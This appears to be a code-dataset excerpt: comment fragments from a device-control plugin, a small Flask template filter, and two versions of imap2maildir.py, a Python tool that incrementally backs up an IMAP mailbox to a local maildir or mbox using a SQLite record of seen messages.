CMD_DOWNLOADIMAGE # [5] => download filename/path # [6] => image resize width # [7] => image resize height # # CMD_RESTFUL_PUT # [5] => data to post as the body (if any, may be blank) # execute the URL fetching depending upon the method requested # if the network command failed then allow the error processor to handle the issue # the response handling will depend upon the type of command... binary returns must be # handled separately from (expected) text-based ones # this is a binary return that should be saved to the file system without modification # execute the actual save from the binary response stream # we have a specific size as a target... # we have a maximum size measurement # if a command line has been formed, fire that off now... 
# we have completed the download and processing successfully... allow the # device (or its descendants) to process successful operations # handle this return as a text-based return # the response value really should not be defined here as it bailed without # catching any of our response error conditions # this is to post a SOAP request to a web service... this will be similar to a restful put request # but will contain a body payload # execute the URL post to the web service # handle this return as a text-based return # this is an unknown command; dispatch it to another routine which is # able to handle the commands (to be overridden for individual devices) # if the command has a pause defined for after it is completed then we # should execute that pause now # complete the dequeuing of the command, allowing the next # command in queue to rise to the top # when the queue is empty, pause a bit on each iteration # if we have just completed a command recently, half the amount of # wait time, assuming that a subsequent command could be forthcoming # check to see if we need to issue an update... # handle any exceptions that are thrown during execution of the plugin... note that this # should terminate the thread, but it may get spun back up again #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine should return the HTTP address that will be used to connect to the # RESTful device. 
It may connect via IP address or a host name #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine should be overridden in individual device classes whenever they must # handle custom commands that are not already defined #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will be called prior to any network operation to allow the addition # of custom headers to the request (does not include file download) #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will process any response from the device following the list of # response objects defined for this device type. For telnet this will always be # a text string #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # loop through the list of response definitions defined in the (base) class # and determine if any match #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will handle an error as thrown by the REST call... it allows # descendant classes to do their own processing #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # This routine will handle notification to the device whenever a file was successfully # downloaded via a DOWNLOAD_FILE or DOWNLOAD_IMAGE command #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| 1.517295
| 2
|
app/customfilters.py
|
razage/TTracker3
| 0
|
6627643
|
def statusname(sid):
    """Template filter: map a status id to its display name taken from the
    application's STATUSES config mapping."""
    # Imported inside the function to avoid a circular import with the app module.
    from app import app
    return app.config["STATUSES"][sid]
|
def statusname(sid):
from app import app
return app.config["STATUSES"][sid]
|
none
| 1
| 1.506923
| 2
|
|
imap2maildir.py
|
rtucker/imap2maildir
| 55
|
6627644
|
<reponame>rtucker/imap2maildir
#!/usr/bin/env python
"""
Mirrors the contents of an IMAP4 mailbox into a local maildir or mbox.
Intended for keeping a local backup of a remote IMAP4 mailbox to protect
against loss. Very handy for backing up "[Gmail]/All Mail" from your
Gmail account, to snag all your archived mail. Re-running it on a regular
basis will update only the stuff it needs to.
Once I need to, I'll write a restore script ;-)
<NAME> <<EMAIL>>
TODO:
PEP-0008 compliance
- Docstrings
"""
version = "%prog 1.10.2 20101018"
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
import email
import getpass
import hashlib
import logging
import mailbox
import optparse
import os
import re
try:
import rfc822
except ImportError:
import rfc822py3 as rfc822
import simpleimap
import sqlite3
import sys
import time
# Handler for logging/debugging/output
log = logging.getLogger(__name__)
console = logging.StreamHandler()
log.addHandler(console)

# Some reasonable application defaults.
# NOTE: 'password' defaults to None (the source dump contained a redacted
# placeholder here); parse_options() prompts interactively when it is falsy,
# matching the documented "Default: prompt user" behavior.
defaults = {
    'debug': 1,
    'password': None,
    'hostname': 'imap.gmail.com',
    'ssl': True,
    'port': False,          # False => pick 993 (SSL) or 143 (clear) later
    'remotefolder': '[Gmail]/All Mail',
    'create': False,
    'maxmessages': 0,       # 0 => no per-run limit
    'configfile': 'imap2maildir.conf',
    'turbo': True,
    'type': 'maildir',
    'mboxdash': False,
    'search': 'SEEN',
}
class SeenMessagesCache(object):
    """In-memory cache of already-seen message uids and hashes.

    Both attributes start as None, meaning "not yet populated"; callers
    (see check_message) lazily fill them with dicts mapping the uid/hash
    to its (folder, mailfile) pair.
    """

    def __init__(self):
        # None marks each cache as unpopulated until first use.
        self.uids = self.hashes = None
class lazyMaildir(mailbox.Maildir):
    """Maildir subclass that avoids re-reading cur/ and new/ unless their
    directory mtimes have changed since the last scan.

    Override of the _refresh method based on the patch from
    http://bugs.python.org/issue1607951 by A.M. Kuchling, 2009-05-02.
    """

    def __init__(self, dirname, factory=rfc822.Message, create=True):
        """Initialize a lazy Maildir instance."""
        mailbox.Maildir.__init__(self, dirname, factory, create)
        self._last_read = None  # Records the last time we read cur/new

    def _refresh(self):
        """Update the table of contents mapping, skipping the rescan when
        neither cur/ nor new/ has been modified since the last read."""
        new_mtime = os.path.getmtime(os.path.join(self._path, 'new'))
        cur_mtime = os.path.getmtime(os.path.join(self._path, 'cur'))
        if (self._last_read is not None and
                new_mtime <= self._last_read and cur_mtime <= self._last_read):
            return
        self._toc = {}

        def update_dir(subdir):
            """Add every file in self._path/subdir to the table of contents."""
            path = os.path.join(self._path, subdir)
            for entry in os.listdir(path):
                p = os.path.join(path, entry)
                if os.path.isdir(p):
                    continue
                uniq = entry.split(self.colon)[0]
                self._toc[uniq] = os.path.join(subdir, entry)

        update_dir('new')
        update_dir('cur')
        # We record the current time - 1sec so that, if _refresh() is called
        # again in the same second, we will always re-read the mailbox
        # just in case it's been modified. (os.path.getmtime() only has
        # 1sec resolution.) This results in a few unnecessary re-reads
        # when _refresh() is called multiple times in the same second,
        # but once the clock ticks over, we will only re-read as needed.
        # (Fixed: the original also computed an unused local 'now'.)
        self._last_read = time.time() - 1
def make_hash(size, date, msgid):
    """Return a stable SHA-1 hex digest identifying a message.

    The digest is derived from the message size, date, and Message-ID, so
    the same message always hashes to the same value across runs.
    """
    # hashlib requires bytes on Python 3; encoding explicitly keeps this
    # working on both Python 2 and 3 (the bare-str form raised TypeError
    # on Python 3).
    return hashlib.sha1(
        ('%i::%s::%s' % (size, date, msgid)).encode('utf-8')).hexdigest()
def open_sql_session(filename):
    """Open the SQLite seen-message database, creating or upgrading the
    seenmessages table as needed, and return the connection."""
    log.debug("Opening sqlite3 database '%s'" % filename)
    conn = sqlite3.connect(filename)
    cursor = conn.cursor()
    # Discover which columns the seenmessages table currently has; an
    # empty list means the table does not exist yet.
    cursor.execute('pragma table_info(seenmessages)')
    existing = [row[1] for row in cursor.fetchall()]
    if not existing:
        # Fresh database: create the full table.
        cursor.execute("""create table seenmessages
        (hash text not null unique, mailfile text not null, uid integer, folder text)""")
    else:
        # Upgrade older schemas in place by adding any missing columns.
        if 'uid' not in existing:
            cursor.execute("""alter table seenmessages add column uid integer""")
        if 'folder' not in existing:
            cursor.execute("""alter table seenmessages add column folder text""")
    conn.commit()
    return conn
def check_message(conn, mbox, hash=None, uid=None, seencache=None):
    """ Checks to see if a given message exists.

    Looks the message up by content hash or by IMAP uid (pass exactly one).
    Lookup order: in-memory seencache, then the sqlite seenmessages table,
    and finally the local mailbox itself to confirm that the recorded mail
    file is still present. Returns falsy when the message is unknown or
    its file is gone; truthy when it exists.
    """
    c = conn.cursor()
    if seencache:
        if seencache.hashes is None:
            # Populate the hash cache with one bulk query instead of
            # hitting the database per message.
            log.debug("Populating hash cache...")
            seencache.hashes = {}
            c.execute('select hash,folder,mailfile from seenmessages')
            for result in c:
                seencache.hashes[str(result[0])] = (result[1], result[2])
            log.debug("Hash cache: %i hashes" % len(seencache.hashes))
        if seencache.uids is None:
            # Populate the uid cache
            log.debug("Populating uid cache...")
            seencache.uids = {}
            c.execute('select uid,folder,mailfile from seenmessages')
            for result in c:
                seencache.uids[str(result[0])] = (result[1], result[2])
            log.debug("Uid cache: %i uids" % len(seencache.uids))
    # NOTE(review): the lookups below dereference seencache directly, so a
    # None seencache would raise AttributeError here -- confirm callers
    # always supply one when passing hash/uid.
    if hash:
        if str(hash) in seencache.hashes:
            folder, mailfile = seencache.hashes[hash]
        else:
            # Cache miss: fall back to a direct database query.
            c.execute('select folder,mailfile from seenmessages where hash=?', (hash,))
            row = c.fetchone()
            if row:
                log.debug("Cache miss on hash %s", hash)
                folder, mailfile = row
            else:
                return False
    elif uid:
        if str(uid) in seencache.uids:
            folder, mailfile = seencache.uids[str(uid)]
        else:
            # Cache miss: fall back to a direct database query.
            c.execute('select folder,mailfile from seenmessages where uid=?', (uid,))
            row = c.fetchone()
            if row:
                log.debug("Cache miss on uid %s" % uid)
                folder, mailfile = row
            else:
                return False
    else:
        # Neither hash nor uid supplied: nothing to look up.
        return False
    if str(mailfile).startswith('POISON-'):
        # This is a fake poison filename! Assume truth.
        log.warning("Poison filename detected; assuming the message "
                    "exists and all is well: %s :: %s",
                    hash or uid, mailfile)
        return True
    elif isinstance(mbox, mailbox.mbox):
        # mailfile will be an int (mbox message key)
        return int(mailfile) in mbox
    elif isinstance(mbox, lazyMaildir):
        # mailfile will be a string; use mbox.get because it is faster
        if folder:
            fmbox = mbox.get_folder(folder)
            return fmbox.get(mailfile)
        return mbox.get(mailfile)
    else:
        # uhh let's wing it
        return mailfile in mbox
def store_hash(conn, hash, mailfile, uid):
    """Record a (hash, mailfile, uid) triple in the seenmessages table,
    replacing any stale row that already carries this hash."""
    cursor = conn.cursor()
    # A duplicate hash can occur when the on-disk mail file went away and
    # the message was re-downloaded; drop the stale row before inserting.
    deleted = cursor.execute('delete from seenmessages where hash = ?', (hash, ))
    if deleted.rowcount > 0:
        log.debug('!!! Nuked duplicate hash %s' % hash)
    cursor.execute('insert into seenmessages values (?,?,?,?)',
                   (hash, mailfile, uid, ''))
    conn.commit()
def add_uid_to_hash(conn, hash, uid):
    """Backfill the uid column for an existing row (rows written by older
    versions of the database were stored without one)."""
    cursor = conn.cursor()
    cursor.execute('update seenmessages set uid = ? where hash = ?',
                   (uid, hash))
    conn.commit()
def open_mailbox_maildir(directory, create=False):
    """Open a local maildir at *directory* using the lazy-refresh subclass;
    when create is True a missing maildir is created."""
    return lazyMaildir(directory, create=create)
def open_mailbox_mbox(filename, create=False):
    """Open an mbox file and acquire its lock for writing; the caller is
    responsible for unlocking when finished."""
    box = mailbox.mbox(filename, create=create)
    box.lock()
    return box
def smells_like_maildir(working_dir):
    """Return True if working_dir contains the cur/, new/ and tmp/ entries
    that characterize a maildir."""
    return all(os.path.exists(os.path.join(working_dir, subdir))
               for subdir in ('cur', 'new', 'tmp'))
def parse_config_file(defaults, configfile='imap2maildir.conf'):
    """Load configuration from *configfile* when it exists.

    Returns a (ConfigParser, bool) tuple; the bool reports whether the
    file was actually read.
    """
    config = ConfigParser(defaults)
    found = bool(config.read(configfile))
    if found:
        log.debug('Reading config from ' + configfile)
    else:
        log.debug('No config found at ' + configfile)
    return (config, found)
class FirstOptionParser(optparse.OptionParser):
    """ Adjusts parse_args so it won't complain too heavily about
    options that don't exist.

    Used for the first pass over the command line, which only needs to
    locate -c/--config-file; any other option would make the stock parser
    raise BadOptionError and exit.

    Lifted lock, stock, and barrel from /usr/lib/python2.6/optparse.py
    """
    def parse_args(self, args=None, values=None):
        """
        parse_args(args : [string] = sys.argv[1:],
                   values : Values = None)
        -> (values : Values, args : [string])

        Parse the command-line options found in 'args' (default:
        sys.argv[1:]). Any errors result in a call to 'error()', which
        by default prints the usage message to stderr and calls
        sys.exit() with an error message. On success returns a pair
        (values, args) where 'values' is an Values instance (with all
        your option values) and 'args' is the list of arguments left
        over after parsing options.
        """
        rargs = self._get_args(args)
        if values is None:
            values = self.get_default_values()
        self.rargs = rargs
        self.largs = largs = []
        self.values = values
        while 1:
            try:
                # _process_args consumes rargs as it goes, so looping after
                # a BadOptionError simply resumes past the unknown option.
                # (The 'stop' return value is unused; kept from the stdlib
                # original this was copied from.)
                stop = self._process_args(largs, rargs, values)
                break
            except optparse.BadOptionError:
                # Just a bad option, let's try this again
                pass
            except (optparse.OptionValueError) as err:
                self.error(str(err))
        args = largs + rargs
        return self.check_values(values, args)
def parse_options(defaults):
    """Parse the command line (and config file) into an options object.

    A first, lenient pass looks only for -c/--config-file; the named
    config file (or the default) then supplies defaults for the second,
    full optparse pass. Exits via parser.error() on invalid input and
    prompts for a password when none was supplied.
    """
    # First round of command line parsing: look for a -c option.
    firstparser = FirstOptionParser(add_help_option=False)
    firstparser.set_defaults(configfile=defaults['configfile'])
    firstparser.add_option("-c", "--config-file", dest="configfile")
    (firstoptions, firstargs) = firstparser.parse_args()
    # Parse a config file
    (parsedconfig, gotconfig) = parse_config_file(
        defaults, configfile=firstoptions.configfile)
    # Parse command line options
    usage = "usage: %prog [options]"
    description = "A script to copy a remote IMAP folder to a local mail "
    description += "storage area. Ideal for incremental backups of mail "
    description += "from free webmail providers, or perhaps as an "
    description += "alternative to fetchmail. Supports mbox and maildir, "
    description += "despite the name. "
    description += "See COPYRIGHT for your rights; "
    description += "https://github.com/rtucker/imap2maildir/ for info."
    if gotconfig:
        description += '\n\nConfiguration defaults read from file "%s"' \
            % firstoptions.configfile
    parser = optparse.OptionParser(usage=usage, version=version,
                                   description=description)
    # Set up some groups
    required = optparse.OptionGroup(parser, "Required options")
    optional = optparse.OptionGroup(parser, "Optional and debugging options")
    # Seed parser defaults from the config file (or app defaults), coercing
    # the string values that the config parser returns.
    if gotconfig:
        sectionname = 'imap2maildir'
    else:
        sectionname = 'DEFAULT'
    clist = parsedconfig.items(sectionname, raw=True)
    for i in clist:
        iname = i[0]
        if i[1] == 'False':
            ivalue = False
        elif i[1] == 'True':
            ivalue = True
        elif i[0] in ['port', 'debug', 'maxmessages']:
            ivalue = int(i[1])
        else:
            ivalue = i[1]
        parser.set_default(iname, ivalue)
    # Define the individual options
    required.add_option("-u", "--username", dest="username",
        help="Username for authentication to IMAP server", metavar="USERNAME")
    required.add_option("-d", "--destination", dest="destination",
        help="Where to store the mail, e.g. ~/Backups/Gmail",
        metavar="PATH")
    optional.add_option("-p", "--password", dest="password",
        help="Password for IMAP server. Default: prompt user",
        metavar="PASSWORD")
    optional.add_option("-H", "--hostname", dest="hostname",
        help="Hostname of IMAP server, default: %default", metavar="HOSTNAME")
    optional.add_option("-P", "--port", dest="port",
        help="Port number. Default: 993 (SSL), 143 (clear)", metavar="PORT")
    optional.add_option("-v", "--verbose", dest="debug",
        help="Turns up the verbosity", action="store_const", const=2)
    optional.add_option("-q", "--quiet", dest="debug",
        help="Quiets all output (except prompts and errors)",
        action="store_const", const=0)
    optional.add_option("-r", "--remote-folder", dest="remotefolder",
        help="Remote IMAP folder. Default: %default",
        metavar="FOLDERNAME")
    optional.add_option("-s", "--search", dest="search",
        help="IMAP4 search criteria to use. Default: %default",
        metavar="CRITERIA")
    optional.add_option("--create", dest="create",
        help="If --destination doesn't exist, create it", action="store_true")
    optional.add_option("--no-turbo", "-T", dest="turbo",
        help="Check for message locally before asking IMAP. Default: %default",
        action="store_false")
    optional.add_option("-m", "--max-messages", dest="maxmessages",
        help="How many messages to process in one run (0=infinite). " +
        "Default: %default",
        metavar="MAX", type="int")
    optional.add_option("-c", "--config-file", dest="configfile",
        help="Configuration file to use. Default: %default")
    optional.add_option("-S", "--ssl", dest="ssl",
        help="Use SSL to connect, default: %default", action="store_true")
    optional.add_option("-t", "--type", dest="type", action="store",
        help="Mailbox type. Choice of: maildir, mbox. Default: %default",
        choices=['maildir', 'mbox'])
    optional.add_option("--mboxdash", dest="mboxdash", action="store_true",
        help="Use - in the mbox From line instead of sender's address. " +
        "Default: %default")
    # Parse
    parser.add_option_group(required)
    parser.add_option_group(optional)
    (options, args) = parser.parse_args()
    # Check for required options
    if not options.username:
        parser.error("Must specify a username (-u/--username).")
    if not options.destination:
        parser.error("Must specify a destination directory (-d/--destination).")
    if not os.path.exists(options.destination):
        if not options.create:
            parser.error("Destination '%s' does not exist. Use --create."
                         % options.destination)
    elif (options.type == 'maildir'
            and not smells_like_maildir(options.destination)):
        parser.error("Directory '%s' exists, but it isn't a maildir."
                     % options.destination)
    if not options.password:
        # Prompt interactively when no password was given on the command
        # line or in the config file (the source dump contained a redacted
        # placeholder here; getpass matches "Default: prompt user" above).
        options.password = getpass.getpass()
    # Set up debugging
    if options.debug == 0:
        log.setLevel(logging.ERROR)
    elif options.debug == 1:
        log.setLevel(logging.INFO)
    else:
        log.setLevel(logging.DEBUG)
    return options
def copy_messages_by_folder(folder, db, imap, mbox, limit=0, turbo=False,
mboxdash=False, search=None, seencache=None):
"""Copies any messages that haven't yet been seen from imap to mbox.
copy_messages_by_folder(folder=simpleimap.SimpleImapSSL().Folder(),
db=open_sql_session(),
imap=simpleimap.SimpleImapSSL(),
mbox=open_mailbox_*(),
limit=max number of messages to handle (0 = inf),
turbo=boolean,
mboxdash=use '-' for mbox From line email?,
search=imap criteria (string),
seencache=an object to cache seen messages,
Returns: {'total': total length of folder,
'handled': total messages handled,
'copied': total messages copied,
'copiedbytes': size of total messages copied,
'lastuid': last UID seen}
"""
outdict = {'turbo': 0, 'handled': 0, 'copied': 0, 'copiedbytes': 0, 'lastuid': 0}
outdict['total'] = len(folder)
log.info("Synchronizing %i messages from %s:%s to %s..." % (outdict['total'], folder.host, folder.folder, mbox._path))
msgpath = os.path.join(mbox._path, 'new')
if turbo:
# This will pass the check_message function and some useful cargo
# along to the Summaries() function in the FolderClass. It will
# use this to check the local cache for the message before hitting
# the outside world. (TODO: Make this less suckful.)
log.debug('TURBO MODE ENGAGED!')
folder.__turbo__(lambda uid: check_message(db, mbox, uid=str(uid), seencache=seencache))
else:
log.debug('Not using turbo mode...')
folder.__turbo__(None)
# Iterate through the message summary dicts for the folder.
for i in folder.Summaries(search=search):
# i = {'uid': , 'msgid': , 'size': , 'date': }
# Seen it yet?
msghash = make_hash(i['size'], i['date'], i['msgid'])
if not check_message(db, mbox, hash=msghash, seencache=seencache):
# Hash not found, copy it.
try:
message = imap.get_message_by_uid(i['uid'])
except Exception:
log.exception('ERROR: Could not retrieve message: %s' % repr(i))
if outdict['handled'] < 1:
log.error("Adding message hash %s to seencache, to avoid "
"future problems...", msghash)
store_hash(db, msghash, 'POISON-%s' % msghash, i['uid'])
add_uid_to_hash(db, msghash, i['uid'])
break
if mboxdash:
envfrom = '-'
else:
envfrom = i['envfrom']
message.set_unixfrom("From %s %s" % (envfrom,
time.asctime(imap.parseInternalDate(i['date']))))
msgfile = mbox.add(message)
store_hash(db, msghash, msgfile, i['uid'])
log.debug(' NEW: ' + repr(i))
outdict['copied'] += 1
outdict['copiedbytes'] += i['size']
elif not check_message(db, mbox, uid=str(i['uid']), seencache=seencache):
# UID is missing in the database (old version needs updated)
log.debug('Adding uid %i to msghash %s', i['uid'], msghash)
add_uid_to_hash(db, msghash, i['uid'])
else:
log.debug('Unexpected turbo mode on uid %i', i['uid'])
# Update our counters.
outdict['handled'] += 1
outdict['turbo'] = folder.turbocounter()
if outdict['handled'] % 100 == 0:
percentage = ((outdict['handled'] + outdict['turbo'])/ float(outdict['total'])) * 100
log.info('Copied: %i, Turbo: %i, Seen: %i (%i%%, latest UID %i, date %s)' %
(outdict['copied'], outdict['turbo'], outdict['handled'],
percentage, i['uid'], i['date']))
outdict['lastuid'] = i['uid']
if (outdict['handled'] >= limit) and (limit > 0):
log.info('Limit of %i messages reached' % limit)
break
# Make sure this gets updated...
outdict['turbo'] = folder.turbocounter()
return outdict
def main():
""" main loop
"""
log.debug('Hello. Version %s' % version)
# Parse the command line and config file
options = parse_options(defaults)
# Check to make sure the mailbox type is valid (probably redundant)
if options.type not in ['maildir', 'mbox']:
raise ValueError("No valid mailbox type specified")
# Open mailbox and database, and copy messages
try:
if options.type == 'maildir':
mbox = open_mailbox_maildir(options.destination, options.create)
db = open_sql_session(os.path.join(options.destination, '.imap2maildir.sqlite'))
elif options.type == 'mbox':
mbox = open_mailbox_mbox(options.destination, options.create)
db = open_sql_session(options.destination + '.sqlite')
seencache = SeenMessagesCache()
# Connect to IMAP server
imapserver = simpleimap.Server(hostname=options.hostname,
username=options.username, password=<PASSWORD>.password,
port=options.port, ssl=options.ssl)
imap = imapserver.Get()
# Instantiate a folder
folder = imap.Folder(folder=options.remotefolder)
folder.__keepaliver__(imapserver.Keepalive)
result = copy_messages_by_folder(folder=folder,
db=db,
imap=imap,
mbox=mbox,
limit=options.maxmessages,
turbo=options.turbo,
mboxdash=options.mboxdash,
search=options.search,
seencache=seencache)
except (KeyboardInterrupt, SystemExit):
log.warning('Caught interrupt; clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
except:
log.exception('Exception! Clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
# Unlock the mailbox if locked.
mbox.unlock()
# Print results.
log.info('FINISHED: Turboed %(turbo)i, handled %(handled)i, copied %(copied)i (%(copiedbytes)i bytes), last UID was %(lastuid)i' % result)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
"""
Mirrors the contents of an IMAP4 mailbox into a local maildir or mbox.
Intended for keeping a local backup of a remote IMAP4 mailbox to protect
against loss. Very handy for backing up "[Gmail]/All Mail" from your
Gmail account, to snag all your archived mail. Re-running it on a regular
basis will update only the stuff it needs to.
Once I need to, I'll write a restore script ;-)
<NAME> <<EMAIL>>
TODO:
PEP-0008 compliance
- Docstrings
"""
version = "%prog 1.10.2 20101018"
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
import email
import getpass
import hashlib
import logging
import mailbox
import optparse
import os
import re
try:
import rfc822
except ImportError:
import rfc822py3 as rfc822
import simpleimap
import sqlite3
import sys
import time
# Handler for logging/debugging/output
log = logging.getLogger(__name__)
console = logging.StreamHandler()
log.addHandler(console)
# Some reasonable application defaults
defaults = {
'debug': 1,
'password': <PASSWORD>,
'hostname': 'imap.gmail.com',
'ssl': True,
'port': False,
'remotefolder': '[Gmail]/All Mail',
'create': False,
'maxmessages': 0,
'configfile': 'imap2maildir.conf',
'turbo': True,
'type': 'maildir',
'mboxdash': False,
'search': 'SEEN',
}
class SeenMessagesCache(object):
""" Cache for seen message UIDs and Hashes
"""
def __init__(self):
""" Constructor
"""
self.uids = None
self.hashes = None
class lazyMaildir(mailbox.Maildir):
""" Override the _refresh method, based on patch from
http://bugs.python.org/issue1607951
by A.M. Kuchling, 2009-05-02
"""
def __init__(self, dirname, factory=rfc822.Message, create=True):
"""Initialize a lazy Maildir instance."""
mailbox.Maildir.__init__(self, dirname, factory, create)
self._last_read = None # Records the last time we read cur/new
def _refresh(self):
"""Update table of contents mapping."""
new_mtime = os.path.getmtime(os.path.join(self._path, 'new'))
cur_mtime = os.path.getmtime(os.path.join(self._path, 'cur'))
if (self._last_read is not None and
new_mtime <= self._last_read and cur_mtime <= self._last_read):
return
self._toc = {}
def update_dir (subdir):
""" update_dir
"""
path = os.path.join(self._path, subdir)
for entry in os.listdir(path):
p = os.path.join(path, entry)
if os.path.isdir(p):
continue
uniq = entry.split(self.colon)[0]
self._toc[uniq] = os.path.join(subdir, entry)
update_dir('new')
update_dir('cur')
# We record the current time - 1sec so that, if _refresh() is called
# again in the same second, we will always re-read the mailbox
# just in case it's been modified. (os.path.mtime() only has
# 1sec resolution.) This results in a few unnecessary re-reads
# when _refresh() is called multiple times in the same second,
# but once the clock ticks over, we will only re-read as needed.
now = int(time.time() - 1)
self._last_read = time.time() - 1
def make_hash(size, date, msgid):
""" Returns a hash of a message given the size, date, and msgid thingies.
"""
return hashlib.sha1('%i::%s::%s' % (size, date, msgid)).hexdigest()
def open_sql_session(filename):
""" Opens a SQLite database, initializing it if required
"""
log.debug("Opening sqlite3 database '%s'" % filename)
conn = sqlite3.connect(filename)
c = conn.cursor()
# gather info about the seenmessages table
c.execute('pragma table_info(seenmessages)')
columns = ' '.join(i[1] for i in c.fetchall()).split()
if columns == []:
# need to create the seenmessages table
c.execute("""create table seenmessages
(hash text not null unique, mailfile text not null, uid integer, folder text)""")
else:
if not 'uid' in columns:
# old db; need to add a column for uid
c.execute("""alter table seenmessages add column uid integer""")
if not 'folder' in columns:
# need to add a column for folder
c.execute("""alter table seenmessages add column folder text""")
conn.commit()
return conn
def check_message(conn, mbox, hash=None, uid=None, seencache=None):
""" Checks to see if a given message exists.
"""
c = conn.cursor()
if seencache:
if seencache.hashes is None:
# Populate the hash cache
log.debug("Populating hash cache...")
seencache.hashes = {}
c.execute('select hash,folder,mailfile from seenmessages')
for result in c:
seencache.hashes[str(result[0])] = (result[1], result[2])
log.debug("Hash cache: %i hashes" % len(seencache.hashes))
if seencache.uids is None:
# Populate the uid cache
log.debug("Populating uid cache...")
seencache.uids = {}
c.execute('select uid,folder,mailfile from seenmessages')
for result in c:
seencache.uids[str(result[0])] = (result[1], result[2])
log.debug("Uid cache: %i uids" % len(seencache.uids))
if hash:
if str(hash) in seencache.hashes:
folder, mailfile = seencache.hashes[hash]
else:
c.execute('select folder,mailfile from seenmessages where hash=?', (hash,))
row = c.fetchone()
if row:
log.debug("Cache miss on hash %s", hash)
folder, mailfile = row
else:
return False
elif uid:
if str(uid) in seencache.uids:
folder, mailfile = seencache.uids[str(uid)]
else:
c.execute('select folder,mailfile from seenmessages where uid=?', (uid,))
row = c.fetchone()
if row:
log.debug("Cache miss on uid %s" % uid)
folder, mailfile = row
else:
return False
else:
return False
if str(mailfile).startswith('POISON-'):
# This is a fake poison filename! Assume truth.
log.warning("Poison filename detected; assuming the message "
"exists and all is well: %s :: %s",
hash or uid, mailfile)
return True
elif isinstance(mbox, mailbox.mbox):
# mailfile will be an int
return int(mailfile) in mbox
elif isinstance(mbox, lazyMaildir):
# mailfile will be a string; use mbox.get because it is faster
if folder:
fmbox = mbox.get_folder(folder)
return fmbox.get(mailfile)
return mbox.get(mailfile)
else:
# uhh let's wing it
return mailfile in mbox
def store_hash(conn, hash, mailfile, uid):
""" Given a database connection, hash, mailfile, and uid,
stashes it in the database
"""
c = conn.cursor()
# nuke it if it's already there. (can happen if disk file goes away)
cur = c.execute('delete from seenmessages where hash = ?', (hash, ))
if cur.rowcount > 0:
log.debug('!!! Nuked duplicate hash %s' % hash)
c.execute('insert into seenmessages values (?,?,?,?)', (hash, mailfile, uid, ''))
conn.commit()
def add_uid_to_hash(conn, hash, uid):
""" Adds a uid to a hash that's missing its uid
"""
c = conn.cursor()
c.execute('update seenmessages set uid = ? where hash = ?', (uid, hash))
conn.commit()
def open_mailbox_maildir(directory, create=False):
""" There is a mailbox here.
"""
return lazyMaildir(directory, create=create)
def open_mailbox_mbox(filename, create=False):
""" Open a mbox file, lock for writing
"""
mbox = mailbox.mbox(filename, create=create)
mbox.lock()
return mbox
def smells_like_maildir(working_dir):
""" Quick check for the cur/tmp/new folders
"""
return os.path.exists(os.path.join(working_dir, 'cur')) and \
os.path.exists(os.path.join(working_dir, 'new')) and \
os.path.exists(os.path.join(working_dir, 'tmp'))
def parse_config_file(defaults,configfile='imap2maildir.conf'):
""" Parse config file, if exists.
Returns a tuple with a ConfigParser instance and either True or
False, depending on whether the config was read...
"""
config = ConfigParser(defaults)
if config.read(configfile):
log.debug('Reading config from ' + configfile)
return (config, True)
else:
log.debug('No config found at ' + configfile)
return (config, False)
class FirstOptionParser(optparse.OptionParser):
""" Adjusts parse_args so it won't complain too heavily about
options that don't exist.
Lifted lock, stock, and barrel from /usr/lib/python2.6/optparse.py
"""
def parse_args(self, args=None, values=None):
"""
parse_args(args : [string] = sys.argv[1:],
values : Values = None)
-> (values : Values, args : [string])
Parse the command-line options found in 'args' (default:
sys.argv[1:]). Any errors result in a call to 'error()', which
by default prints the usage message to stderr and calls
sys.exit() with an error message. On success returns a pair
(values, args) where 'values' is an Values instance (with all
your option values) and 'args' is the list of arguments left
over after parsing options.
"""
rargs = self._get_args(args)
if values is None:
values = self.get_default_values()
self.rargs = rargs
self.largs = largs = []
self.values = values
while 1:
try:
stop = self._process_args(largs, rargs, values)
break
except optparse.BadOptionError:
# Just a bad option, let's try this again
pass
except (optparse.OptionValueError) as err:
self.error(str(err))
args = largs + rargs
return self.check_values(values, args)
def parse_options(defaults):
""" First round of command line parsing: look for a -c option.
"""
firstparser = FirstOptionParser(add_help_option=False)
firstparser.set_defaults(configfile=defaults['configfile'])
firstparser.add_option("-c", "--config-file", dest="configfile")
